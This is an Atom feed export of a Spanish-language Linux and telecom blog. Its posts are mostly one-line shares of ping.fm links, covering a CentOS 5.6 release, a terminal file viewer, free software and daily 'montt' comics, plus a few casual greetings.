<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5347199699038004890</id><updated>2012-02-16T13:02:07.508-08:00</updated><title type='text'>Asterisk Over Flow - Juan Fernando Villa</title><subtitle type='html'>MI idea de este blog es centralizar la información que tengo de 100 paginas que me llegan a traves de mi google reader como me estaba volviendo loco devolviendome una y otra vez para buscar algo, nacio este blog. ahora pongo aqui lo que mas me gusta, lo importante, lo relevante, lo esencial, lo nuevo, lo util y lo eficaz.... Espero disfruten...!!!
Juan Fernando Villa
Desarrollador de Tecnologias de Información y Telecomunicaciones.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default?start-index=101&amp;max-results=100'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>180</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4555890005755178054</id><published>2011-04-12T22:12:00.001-07:00</published><updated>2011-04-12T22:12:46.885-07:00</updated><title type='text'></title><content type='html'>&lt;a href="http://ping.fm/l58mH"&gt;http://ping.fm/l58mH&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4555890005755178054?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4555890005755178054/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4555890005755178054' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4555890005755178054'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4555890005755178054'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/04/httpping_12.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-3658991725346760017</id><published>2011-04-12T22:00:00.001-07:00</published><updated>2011-04-12T22:00:45.138-07:00</updated><title type='text'></title><content type='html'>Por fin, disponible CentOS 5.6 &lt;a href="http://ping.fm/9FbJ8"&gt;http://ping.fm/9FbJ8&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-3658991725346760017?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/3658991725346760017/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=3658991725346760017' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3658991725346760017'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3658991725346760017'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/04/por-fin-disponible-centos-5.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4005848098915629903</id><published>2011-04-12T21:55:00.001-07:00</published><updated>2011-04-12T21:55:12.095-07:00</updated><title type='text'></title><content type='html'>Navega y visualiza los archivos con Terminal Preview &lt;a href="http://ping.fm/DYlbi"&gt;http://ping.fm/DYlbi&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4005848098915629903?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4005848098915629903/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4005848098915629903' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4005848098915629903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4005848098915629903'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/04/navega-y-visualiza-los-archivos-con.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8593621135240800045</id><published>2011-04-12T21:35:00.001-07:00</published><updated>2011-04-12T21:35:28.882-07:00</updated><title type='text'></title><content type='html'>&lt;a href="http://ping.fm/KWnNW"&gt;http://ping.fm/KWnNW&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8593621135240800045?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8593621135240800045/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8593621135240800045' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8593621135240800045'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8593621135240800045'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/04/httpping.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-521996460100194218</id><published>2011-04-12T21:31:00.001-07:00</published><updated>2011-04-12T21:31:39.694-07:00</updated><title type='text'></title><content type='html'>Software Libre y su Nuevo Entorno &lt;a href="http://ping.fm/W9haw"&gt;http://ping.fm/W9haw&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-521996460100194218?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/521996460100194218/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=521996460100194218' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/521996460100194218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/521996460100194218'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/04/software-libre-y-su-nuevo-entorno.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5376927149796839719</id><published>2011-03-16T15:17:00.001-07:00</published><updated>2011-03-16T15:17:31.305-07:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-03-15 &lt;a href="http://ping.fm/MbXDA"&gt;http://ping.fm/MbXDA&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5376927149796839719?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5376927149796839719/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5376927149796839719' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5376927149796839719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5376927149796839719'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-03-15.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-2222775260277827162</id><published>2011-03-01T19:06:00.001-08:00</published><updated>2011-03-01T19:06:36.988-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-01-17 &lt;a href="http://ping.fm/eATnB"&gt;http://ping.fm/eATnB&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-2222775260277827162?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/2222775260277827162/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=2222775260277827162' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2222775260277827162'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2222775260277827162'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-01-17.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4919355791775429832</id><published>2011-03-01T19:03:00.003-08:00</published><updated>2011-03-01T19:03:31.905-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-01-24 &lt;a href="http://ping.fm/X0F5s"&gt;http://ping.fm/X0F5s&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4919355791775429832?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4919355791775429832/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4919355791775429832' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4919355791775429832'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4919355791775429832'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-01-24.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7805440323954056165</id><published>2011-03-01T19:03:00.001-08:00</published><updated>2011-03-01T19:03:02.016-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-01-26 &lt;a href="http://ping.fm/2YgkT"&gt;http://ping.fm/2YgkT&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7805440323954056165?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7805440323954056165/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7805440323954056165' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7805440323954056165'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7805440323954056165'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-01-26.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5152223552572028791</id><published>2011-03-01T19:02:00.001-08:00</published><updated>2011-03-01T19:02:49.864-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-01-27 &lt;a href="http://ping.fm/M6Z5R"&gt;http://ping.fm/M6Z5R&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5152223552572028791?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5152223552572028791/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5152223552572028791' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5152223552572028791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5152223552572028791'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-01-27.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7558738061717775257</id><published>2011-03-01T18:45:00.001-08:00</published><updated>2011-03-01T18:45:19.652-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-01-31 &lt;a href="http://ping.fm/nNTKv"&gt;http://ping.fm/nNTKv&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7558738061717775257?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7558738061717775257/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7558738061717775257' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7558738061717775257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7558738061717775257'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-01-31.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-3277753599034158161</id><published>2011-03-01T18:44:00.001-08:00</published><updated>2011-03-01T18:44:29.206-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-02-02 &lt;a href="http://ping.fm/mPgFg"&gt;http://ping.fm/mPgFg&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-3277753599034158161?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/3277753599034158161/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=3277753599034158161' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3277753599034158161'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3277753599034158161'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-02-02.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-3233573521881795425</id><published>2011-03-01T18:43:00.001-08:00</published><updated>2011-03-01T18:43:05.708-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-02-15 &lt;a href="http://ping.fm/VI1Gj"&gt;http://ping.fm/VI1Gj&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-3233573521881795425?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/3233573521881795425/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=3233573521881795425' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3233573521881795425'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3233573521881795425'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-02-15.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-476493825491491140</id><published>2011-03-01T18:42:00.001-08:00</published><updated>2011-03-01T18:42:37.938-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-02-16 &lt;a href="http://ping.fm/KHP38"&gt;http://ping.fm/KHP38&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-476493825491491140?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/476493825491491140/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=476493825491491140' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/476493825491491140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/476493825491491140'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-02-16.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-3780169042138807015</id><published>2011-03-01T18:41:00.003-08:00</published><updated>2011-03-01T18:41:29.893-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-02-23 &lt;a href="http://ping.fm/8o1Xt"&gt;http://ping.fm/8o1Xt&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-3780169042138807015?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/3780169042138807015/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=3780169042138807015' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3780169042138807015'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/3780169042138807015'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-02-23.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8281883638253703874</id><published>2011-03-01T18:41:00.001-08:00</published><updated>2011-03-01T18:41:15.112-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-02-24 &lt;a href="http://ping.fm/QiMu4"&gt;http://ping.fm/QiMu4&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8281883638253703874?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8281883638253703874/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8281883638253703874' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8281883638253703874'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8281883638253703874'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-02-24.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7583879880486590411</id><published>2011-03-01T18:39:00.001-08:00</published><updated>2011-03-01T18:39:49.129-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-02-25 &lt;a href="http://ping.fm/5gmPE"&gt;http://ping.fm/5gmPE&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7583879880486590411?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7583879880486590411/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7583879880486590411' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7583879880486590411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7583879880486590411'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-02-25.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-1546210027518787152</id><published>2011-03-01T18:37:00.001-08:00</published><updated>2011-03-01T18:37:10.578-08:00</updated><title type='text'></title><content type='html'>montt en dosis diarias - 2011-03-02 &lt;a href="http://ping.fm/4CIqm"&gt;http://ping.fm/4CIqm&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-1546210027518787152?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/1546210027518787152/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=1546210027518787152' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1546210027518787152'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1546210027518787152'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/03/montt-en-dosis-diarias-2011-03-02.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8084869031248642156</id><published>2011-02-22T13:34:00.001-08:00</published><updated>2011-02-22T13:34:11.203-08:00</updated><title type='text'></title><content type='html'>Tarde lluviosa #jfvilla&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8084869031248642156?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8084869031248642156/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8084869031248642156' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8084869031248642156'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8084869031248642156'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/tarde-lluviosa-jfvilla.html' title=''/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-2540612448967362226</id><published>2011-02-22T13:02:00.001-08:00</published><updated>2011-02-22T13:02:34.271-08:00</updated><title type='text'></title><content type='html'>Buenas Tardes a todos #jfvilla&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-2540612448967362226?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/2540612448967362226/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=2540612448967362226' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2540612448967362226'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2540612448967362226'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2011/02/buenas-tardes-todos-jfvilla.html' title=''/><author><name>Elite 